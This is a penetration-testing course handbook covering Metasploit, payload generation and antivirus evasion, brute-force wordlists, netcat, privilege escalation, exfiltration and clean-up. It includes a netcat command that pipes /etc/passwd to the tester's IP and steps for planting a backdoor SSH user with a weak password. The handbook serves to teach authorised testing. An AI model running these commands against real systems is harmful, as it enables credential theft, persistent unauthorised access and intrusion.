Penetration Testing - Course Handbook
Technical Foundations Linux & Networking
Baruch Garcia-Gallo
1 | WYWM Penetration Testing Module Handbook
Table of Contents
Pentest (page 2)
Methodology (page 2)
Exploitation (page 2)
  What you need to know about exploitation (page 3)
  Metasploit (page 4)
  Finding Published Exploits (page 8)
  Available and Custom Created Wordlists for Brute-forcing (page 9)
    Wordlists Available on Kali (page 9)
    Generating Custom Wordlists (page 10)
  Netcat (page 12)
Post Exploitation (page 12)
  Privilege Escalation (page 12)
  Data Exfiltration (page 14)
  Clean-up (page 15)
Pentest
A penetration test is the process of compromising/exploiting a target machine to gain root/admin privileges and download/exfiltrate company data. A penetration test (pentest) is conducted after vulnerability discovery has been completed during a vulnerability assessment (VA).
After the pentest you will be required to produce a detailed report, which will be of high value to the company hiring your services.
The report will outline the following:
• Exploitation method
• Data exfiltrated
• Affected systems
• How the client may remediate the issues found
Methodology
Reading the RoE/scope and conducting a vulnerability assessment (excluding report writing) are both to be completed before continuing with the penetration test.
Pentest Methodology
1. Exploitation: compromise the target system
2. Privilege Escalation: gain root/admin access
3. Data Exfiltration: extract private information
4. Clean-Up: remove any uploaded files, including backdoors etc.
5. Report Writing: it’s all about supplying this end product
Exploitation
You can exploit a system not only through published vulnerabilities but also through service misconfigurations. For example, an FTP service might have anonymous login enabled and allow file uploads over that anonymous login. This is not a vulnerability, as it is just how the service normally runs. However, it is a poorly designed component of the service, a misconfiguration that could allow an attacker to gain a foothold on the target. So, although we need to focus on vulnerability research, we also need to look at how each service is configured when attempting to exploit a target.
What you need to know about exploitation
The goal of exploiting a system (and ultimately of a penetration test) is to gain access to a target system and be able to exfiltrate sensitive data from the client’s network. By exfiltrating business-critical sensitive data, you clearly show a company how their security posture is lacking and provide a means to improve their security.
How to exploit a system
To exploit a system, you need to have a way of directly interacting with the target. In computing, a shell is an interface through which you can interact with a machine. The command line interface in Kali is a shell (Bash stands for Bourne-again shell). When you hear pentesters speaking about getting shells, what they mean is that they want a direct interface through which they can interact with the target. Obviously it is important to gain a direct interface with a target, as it provides a possible means to read, write, delete and copy data on the target system.
Now that you know what a shell is and that you want to get a shell (have access to an interface through which you can interact with the target), you may be asking “how do I get a shell?”. To get a shell you need to put what’s called a “payload” onto the target system.
A payload is a file containing code that runs given commands once on the target system. These commands might create a shell (an interface) that is sent back to us. From there we can interact with the target system through the shell, much as we have interacted with our local Kali machine through the command line interface.
There are different types of shells that behave in different ways: bind shells and reverse shells.
Reverse shells are interfaces that are sent back to our machine. All we have to do is “catch” this incoming connection (with netcat or Metasploit’s multi/handler).
Bind shells are interfaces that listen on an outward-facing port on the target machine. We must then connect to the given port on the target manually from our machine to access the shell (interface).
• Note that getting a shell on the target system is not the only means of data exfiltration, but it is the most versatile and complete way of gaining the ability to access all data on the target. That is why getting a remote shell is highly sought after when conducting a penetration test.
Getting a Payload on the Target
The first stage of getting a shell is to get a payload on the target system. There are many ways to get
a payload on the target machine or network. These can include sending phishing emails, watering hole
attacks, USB drops or even using discovered vulnerabilities or misconfigurations in software or
services to upload the payload directly to the target. Finding a way to get a payload onto the target
device or network is the part of the penetration testing process that takes the largest amount of
knowledge, skills and creativity.
Metasploit
Metasploit is a framework used to automate the exploitation of a target. Metasploit has a large range of exploit modules that automatically run exploits against known vulnerabilities on a selected target; you only need to set a few options to be able to run one of these exploit modules. Metasploit also contains auxiliary modules which can assist in the enumeration of a target. The Rapid7 and Offensive Security websites have information regarding which Metasploit modules to use for the exploitation of specific vulnerabilities. It is still important for you to understand the inner workings of an exploit when running Metasploit exploit modules, as fully understanding how they work means that when unexpected errors occur you can troubleshoot them successfully.
To start Metasploit you must first start the PostgreSQL service, which enables quicker searching when using Metasploit.
To set up the Metasploit database, type the following command:
service postgresql start
To start Metasploit, use the command:
msfconsole
From here Metasploit opens and you can begin by searching for modules to use. You can search for
modules using the search command alongside a service/software name that you are using. Metasploit
has multiple module types available. The main modules you will be using during a penetration test
and even a vulnerability assessment are:
• Auxiliary Modules – These modules assist in service enumeration and discovering software
misconfigurations
• Post Exploitation Modules – These modules are to be used once access to a system has been
gained but you do not have full privileges on the system. These modules assist in privilege
escalation.
• Exploit Modules – These modules assist in the exploitation of a known vulnerability.
Example searching for modules related to specific software type: search proftpd
From here you will have a list of proftpd modules within the Metasploit framework.
You can get information about each module by using the info command.
Example of info command: info exploit/unix/ftp/proftpd_133c_backdoor
Once you have decided on which module you wish to choose you need to select it. To select an exploit
module you call the use command: use exploit/unix/ftp/proftpd_133c_backdoor
Once you have loaded a module you can then see all options that are available to be set in the loaded
module.
In the basic options section you can see which options are required for the module to work properly
– these will be marked as yes under required.
In some exploit modules you can change the payload and target, as some modules have different options when exploiting different targets (such as a Windows or Linux target).
To see the available targets (and the id to set if you change the target), use the command:
show targets
As you can see with the proftpd backdoor exploit, the target is set automatically with an id of 0. In this instance there is only one operating system or software option that can be set as the designated target.
Below you will see an example of show targets for the recent EternalBlue exploit; in this instance you can see this exploit will only be effective against Windows Server 2008 R2 x64 or Windows 7 machines.
Metasploit command | Examples | Description
set | set payload, set rhost, set lport | Sets individual exploit options
show | show options, show targets, show payloads | Provides a list of options, targets or payloads for a specific module
use | use <module name> | Select a module to use
search | search <service/software name> | Search for modules related to specific software or service
use exploit/multi/handler | (a handler to catch a payload as it connects back to your local machine, much like netcat) | Catch a connection coming back to the local host from a payload
Creating your own payload
Kali has many inbuilt webshells that you can use as required (in the /usr/share/webshells/ directory). You can also use msfvenom to create payloads which, given that certain vulnerabilities or misconfigurations are present, you may be able to upload directly onto the target. Msfvenom works by generating shellcode for you. Another tool for shellcode generation is Veil-Ordnance, part of the Veil framework.
Msfvenom can also encode your payloads in an attempt to hide them from antivirus; however, most AV solutions still pick up msfvenom payloads because they are built from a base template that is easily detected. Other encoders include Ps1encode for PowerShell-based payloads and Veil-Evasion, part of the Veil framework. Veil generates shellcode that can bypass most antivirus solutions.
Msfvenom is already preinstalled on Kali (see the msfvenom cheat sheet for usage); however, you can install Veil easily by using the command:
git clone https://github.com/Veil-Framework/Veil
Once cloned, Veil-Ordnance and Veil-Evasion are in the Veil Tools directory, ready for use.
Finding Published Exploits
When using exploits, you should use exploits that come from a reliable source such as exploit-db, or you should be able to look at the exploit code and understand how the exploit works. This is because some exploits may harbor malicious code which you obviously do not want to introduce into a client’s network.
Exploits archived on Offensive Security’s Exploit Database are peer reviewed and reliable and therefore can be used during a penetration test.
Exploit-db – https://www.exploit-db.com/
Shodan exploits - https://exploits.shodan.io/welcome
Packetstorm - https://packetstormsecurity.com/files/tags/exploit/
However, sometimes these exploits are only usable against a specific target type (such as Windows Server 2010 and earlier) even though later Windows Server versions may be vulnerable to the specific vulnerability that the exploit targets. In this instance, to exploit a vulnerable Windows Server 2016 machine you would have to edit the exploit. This is true for the EternalBlue vulnerability, which affects Windows machines running SMBv1.
Available and Custom Created Wordlists for Brute-forcing
When brute-forcing usernames, passwords or directories you can use wordlists. Many wordlists are available in Kali or for download online, and you can also create your own custom wordlists using tools in Kali.
Wordlists Available on Kali
Below is a table of wordlists available in Kali and where to find them.
Wordlist Type | Wordlist File Names | Location
Password List | rockyou.txt, adobe_top100_pass.txt, idrac_default_pass.txt, hci_oracle_passwords.txt, http_default_pass.txt, default_pass_for_services_unhash.txt, db2_default_pass.txt, ipmp_passwords.txt, mirai_passwords.txt, multi_vendor_cctv_dvr_pass.txt, snmp_default_pass.txt, vnc_passwords.txt, tomcat_mgr_default_pass.txt, postgres_default_pass.txt, passwords.lst, oracle_default_passwords.csv, unix_passwords.txt | /usr/share/wordlists/ and /usr/share/wordlists/metasploit
Directory Lists | small.txt, big.txt, best1050.txt, best110.txt, best15.txt | /usr/share/wordlists/dirb/others
First Names | names.txt | /usr/share/wordlists/dirb/others
Webserver-specific Directories and Files Lists | apache.txt, coldfusion.txt, axis.txt, cgis.txt, domino.txt, fatwire_pagenames.txt, fatwire.txt, frontpage.txt, hpsmh.txt, hyperion.txt, iis.txt, iplanet.txt, jboss.txt, jersey.txt, jrun.txt, netware.txt, oracle.txt, ror.txt, sap.txt, sharepoint.txt, sunas.txt, test.txt, tomcat.txt, vignette.txt, weblogic.txt, websphere.txt | /usr/share/wordlists/dirb/vulns
Linux Sensitive Files | sensitive_files.txt | /usr/share/wordlists/metasploit
Generating Custom Wordlists
To have a higher chance of success during brute-force attacks you can create your own custom password lists. Many people create passwords that relate personally to them so that they have a higher chance of remembering their password. In this way you can generate custom password lists based on a person’s birthday, pets, family, likes, dislikes and so on.
CeWL
CeWL stands for custom wordlist generator and as the name suggests generates custom wordlists.
CeWL crawls a given webpage and makes a wordlist based on specified parameters. You can specify
any webpage including a target individual’s social media accounts or webpages of interest to the
individual. As an example, imagine you are on a pentest and you know the network administrator is
obsessed with ‘The Beatles’. Thinking that he has incorporated this into his password you could use
the following CeWL command:
cewl https://en.wikipedia.org/wiki/The_Beatles -d 1 -m 5 -w beatlesPassList.txt
Here CeWL generates a wordlist called beatlesPassList.txt by crawling all words on the Beatles Wikipedia page. It only includes words of at least 5 characters in the wordlist and stays on the Wikipedia page rather than crawling links from it.
-d The depth CeWL will crawl with regard to links on a webpage
-m Only include words whose length is equal to or over the specified number of characters
-w Output the wordlist to the specified file
CUPP
CUPP, the Common User Password Profiler, creates a profile of the target person based on their birthdate, pets, children, spouse and so on, and then uses this information to create a wordlist. Wordlists created by CUPP can be used to brute-force passwords for employees’ email, FTP and SSH, web login portals and internal system access. Below is a screenshot of the questions CUPP uses to profile an individual and create a password list. CUPP also takes into consideration that some people may use numbers to replace some letters within words in their password; as such, CUPP wordlists contain password variations based on this characteristic.
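The CeWL harvesting step and the CUPP-style number substitution described above, reproduced offline as an added example (not CeWL's or CUPP's own code, and not from the handbook): it pulls words of at least five letters from a constructed sample page, mangles them the way a profiler would, and uses the result on the defender's side to test whether a proposed password is built from words a target's public pages expose. The page content in `SAMPLE_HTML` and the suffix list are constructed assumptions.

```python
import re
from html.parser import HTMLParser

# Constructed stand-in for a crawled fan page; not real page content.
SAMPLE_HTML = """
<html><head><title>Fan page</title>
<script>var hidden = "scriptword";</script></head>
<body><h1>The Beatles</h1>
<p>Liverpool band: John, Paul, George and Ringo. Albums include
<a href="/abbey">Abbey Road</a>, Revolver and Rubber Soul.</p>
<p>Strawberry Fields Forever, 1967.</p>
</body></html>
"""

# CUPP-style letter-to-digit substitutions.
LEET = str.maketrans({"a": "4", "e": "3", "i": "1", "o": "0", "s": "5"})


class TextExtractor(HTMLParser):
    """Collect the visible text of a page; script and style bodies are skipped,
    since a CeWL-style list is built from what a reader of the page sees."""

    def __init__(self):
        super().__init__()
        self.chunks = []
        self._skip_depth = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip_depth += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip_depth:
            self._skip_depth -= 1

    def handle_data(self, data):
        if not self._skip_depth:
            self.chunks.append(data)


def cewl_words(html, min_len=5):
    """Words of at least min_len letters from one page, unique, in first-seen
    order: the equivalent of `cewl -m <min_len>` without following links."""
    parser = TextExtractor()
    parser.feed(html)
    parser.close()
    seen = {}
    for word in re.findall(r"[A-Za-z]+", " ".join(parser.chunks)):
        if len(word) >= min_len:
            seen.setdefault(word, None)
    return list(seen)


def password_variants(word, suffixes=("",)):
    """CUPP-style mangling of one word: case forms, leet spelling, suffixes."""
    base = word.lower()
    forms = {base, base.capitalize(), base.translate(LEET)}
    return {form + suffix for form in forms for suffix in suffixes}


def is_guessable(password, wordlist, suffixes=("", "1", "123", "1967")):
    """True when password is a harvested word or one of its mangled variants.
    The suffixes stand in for the dates and numbers a CUPP profile would add."""
    return any(password in password_variants(w, suffixes) for w in wordlist)


if __name__ == "__main__":
    words = cewl_words(SAMPLE_HTML, min_len=5)
    print(len(words), "words:", ", ".join(words))
    for candidate in ("b34tl351967", "Revolver123", "correct horse battery"):
        verdict = "guessable" if is_guessable(candidate, words) else "ok"
        print(candidate, "->", verdict)
```

Feeding the real page text instead of `SAMPLE_HTML` gives a local check that a new password is not a leet or date-suffixed form of a word the organisation publishes about itself.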
Netcat
Netcat is considered the hacking Swiss Army knife. Netcat allows you to connect to open ports, view service versions from open ports, interact with services on open ports, listen on ports on your own machine for incoming connections, listen with a program attached so that a remote connection can interact with that program on a designated port, and send files to other machines through open ports. As you can see, netcat is very versatile and is a good starting point when interacting with a service running on an open port or receiving a connection instigated by a payload you uploaded onto a remote machine during exploitation of the target.
netcat syntax: netcat <flags> <ip address or domain name> <port number>
Note: an IP address is not required if you are just listening on the local host.
netcat flags
-n Numeric IP only, rather than resolving a domain name
-v Verbosity (add two v’s for double verbosity). This option shows more information such as IP addresses and other connection details. Verbosity is helpful when determining the IP address of a domain obscured by a WAF.
-l Listen on a port on your local machine with netcat. Using the -l flag, you do not need to specify an IP address as you are listening on the local host.
-p Specify the port to use (with -l, the local port to listen on)
Post Exploitation
Once a system has been exploited and some control has been gained, we move to what’s known as post exploitation, which may include uploading files and tools to the target machine, privilege escalation, data exfiltration, the clean-up of our presence on the system, etc.
Privilege Escalation
Privilege escalation (PrivEsc) is just that: the act of elevating user privileges/permissions on the target machine so as to gain further control of the target machine and access to confidential data. You’ll often gain access with normal user-level permissions, with the aim of then elevating these to root user permissions.
There are numerous methods to conduct PrivEsc, and they predominantly fall into the following two categories: privilege escalation exploits, and taking advantage of security misconfigurations. Again, the exact methods are specific to the target environment.
In this course I’ll introduce the following PrivEsc methods, giving an example in the videos.
Kernel Exploits, e.g. Dirty COW
By taking advantage of kernel vulnerabilities an attacker can potentially gain the ability to read, write, and execute arbitrary commands with root user permissions. Dirty COW is one such exploit and affects almost all versions of Linux since 2005. It allows an adversary to gain high-level write permissions to an otherwise read-only area of the target. Although this exploit may cause system instability (so use it with caution), I have shown it in the videos as it’s considered one of the most serious local Linux PrivEsc exploits.
Service Configurations
Weak configurations are commonly used for PrivEsc as they are common and have a lower impact on the overall target system than kernel exploits. Listed below are some potential methods.
Weak and Reused Passwords: You can often PrivEsc by attempting to use weak or reused passwords found during enumeration.
SUID Binaries/Services that Run as Root: You can potentially get these to run your commands as root. These programs may initially seem harmless, however they offer the ability to run scripts or commands, e.g. Nmap, Bash, Nano, Vim, cp.
Sudo: If your current permissions on the target machine allow you to run a program using sudo then you can potentially run commands on the target system. As discussed earlier, this can be done by typing either sudo or su before the command.
PrivEsc Tools
The above list is only an insight into possible PrivEsc methods. With so many potential methods, a great place to start, especially if you are limited for time, is with automated tools. Below I’ll list a few tools for elevating your privileges on both Linux and Windows target machines.
LinEnum is a script that runs a range of PrivEsc checks including: kernel details, system info, user info, password policies, checks for stored password hashes, privileged access, permissions, whether the current user has sudo access, cron jobs, checks for default and/or weak credentials, SUID files and world-writable files, NFS details, log file searches, and more.
LinEnum is located at https://github.com/rebootuser/LinEnum
e.g. Syntax: ./LinEnum.sh -k <keyword> -r <report name> -e <export location /tmp/> -t
-t = a thorough scan. Otherwise the default scan is a quick scan.
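Two of the checks LinEnum is described as running above (locating SUID files and world-writable files), which are also the concern behind the SUID/services-as-root item under Service Configurations, reimplemented as a stand-alone Python audit an administrator can run on a host. This is an added example, not LinEnum's code or the handbook's: it builds a small constructed directory tree with tempfile, so `build_sample_tree`, the paths in it and the `EXPECTED_SUID` allowlist are assumptions, and it reports setuid files that are not on the allowlist together with world-writable regular files.

```python
import os
import stat
import tempfile

# Constructed allowlist: paths (relative to the scanned root) that are
# expected to be setuid. Anything setuid and not listed here is reported.
EXPECTED_SUID = {"bin/passwd", "bin/su"}


def audit_tree(root, expected_suid=EXPECTED_SUID):
    """Walk root and return two sorted lists of relative paths:
    unexpected setuid files, and world-writable regular files."""
    suid, world_writable = [], []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished; skip rather than abort
            if not stat.S_ISREG(st.st_mode):
                continue  # symlinks and device nodes are not what these checks target
            rel = os.path.relpath(path, root)
            if st.st_mode & stat.S_ISUID and rel not in expected_suid:
                suid.append(rel)
            if st.st_mode & stat.S_IWOTH:
                world_writable.append(rel)
    return sorted(suid), sorted(world_writable)


def build_sample_tree():
    """Create a small constructed filesystem for the audit and return its root."""
    root = tempfile.mkdtemp(prefix="privesc_audit_")
    layout = {
        "bin/passwd": 0o4755,         # expected setuid, on the allowlist
        "opt/backup/run.sh": 0o4755,  # setuid script nobody allowlisted
        "tmp/notes.txt": 0o666,       # world-writable, an input a user could alter
        "etc/motd": 0o644,            # normal file, must not be reported
    }
    for rel, mode in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("sample\n")
        os.chmod(path, mode)  # setting the setuid bit on a file you own needs no root
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    unexpected, writable = audit_tree(sample_root)
    print("unexpected setuid:", unexpected)
    print("world-writable:", writable)
```

Pointing `audit_tree` at `/` with an allowlist built from a known-good package manifest turns the same two checks into a periodic drift report rather than a one-off enumeration.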
Unix-privesc-check is a script that searches for security misconfigurations which may allow a normal user to escalate privileges. It can be used on different target operating systems including Linux, Unix and Solaris.
Unix-privesc-check is located at: https://github.com/pentestmonkey/unix-privesc-check
Syntax: unix-privesc-check <standard or detailed>
Windows-privesc-check offers similar functionality on Windows target systems to what unix-privesc-check does on Linux targets.
Windows-privesc-check is located at: https://github.com/pentestmonkey/windows-privesc-check/
PowerSploit (PowerShell Post Exploitation Framework) Is a collection of PowerShell modules
useful during all stages of a pentest on a Windows target machine. These modules range from
reconnaissance, PrivEsc, code execution, to data exfiltration.
PowerSploit can be located at: https://github.com/PowerShellMafia/PowerSploit/
I recommend checking out the above link for more information on PowerSploit and its operation.
Data Exfiltration
Data exfiltration is essentially the act of downloading data/files from the target machine. In our case, as a pentester, this data is used as evidence to support our findings. Data can be exfiltrated using numerous methods depending on the target environment; some of these are listed below.
Shells: With certain shells such as Meterpreter (shown in the video and cheat sheet) you can simply use standard commands to navigate through the target system. If the target system is a Windows OS you can use PowerShell or PowerSploit (as outlined above).
Payloads: Metasploit contains a range of payloads capable of exfiltrating data, e.g. backdoors can be used to both upload and download data from the target machine.
Netcat: netcat can easily be used to transfer data between the target and your machine; you can do this with the following commands.
Your machine (in the directory where you want to save the file): nc -l -p 4444 > <filename>
Target machine (from /etc): cat passwd | nc <your IP> 4444
SSH: If the SSH daemon is up you can create a new user and SSH into the target machine.
Check SSH is up: netstat -tulpn | grep sshd
Create a new user on the target machine: /usr/bin/useradd <username>
Create the new user’s password on the target machine: /usr/bin/passwd <username>
Set the password to something easy, e.g. abc123
Add the new user to the SSH config file: echo "AllowUsers <username>" >> /etc/ssh/sshd_config
sshd only reads this file when it starts or reloads, so the new AllowUsers line takes effect after the service is restarted or reloaded.
Now on your machine type: ssh <username>@<target IP> and enter the password you set.
FTP: File Transfer Protocol can often be used to transfer files from the target machine; you may even find anonymous FTP logins.
Web server: hosting the files on the target machine’s web server so they can be fetched over HTTP.
NFS Share: NFS, or Network File System, can be considered as shared file storage on the target machine, and by mounting an exported share you can potentially gain access to certain directories such as the tmp directory.
E.g. mount <target IP>:/ /tmp/
If successful you can go to /tmp/share to view its contents.
CrackMapExec: one of CrackMapExec’s functions is to gather clear-text Windows credentials from a target Windows machine. It is located at https://github.com/byt3bl33d3r/CrackMapExec
I recommend going to the above link to read the documentation and instructions.
Clean-up
As you can imagine, leaving shells waiting for a real adversary after the pentest is complete is not a good idea, and as such cleaning up the target system should always be on your mind and not just an afterthought. So, along with the records you should already be keeping, simply add notes on what alterations were made to the system and where they were made. These recorded alterations should include everything from users created and logs altered to payloads uploaded and more. These notes need to be meticulous in order to prevent you missing something and compromising the target system’s security.
These notes aren’t just for your records; they will also provide administrators with a list of the actions necessary in the event that you are unable to remove a file or time constraints don’t allow you to clean the target.
When cleaning up, simply use the rm command to remove all items on your list, then undo any actions you performed on the system. When complete, let the sysadmins know what has been done.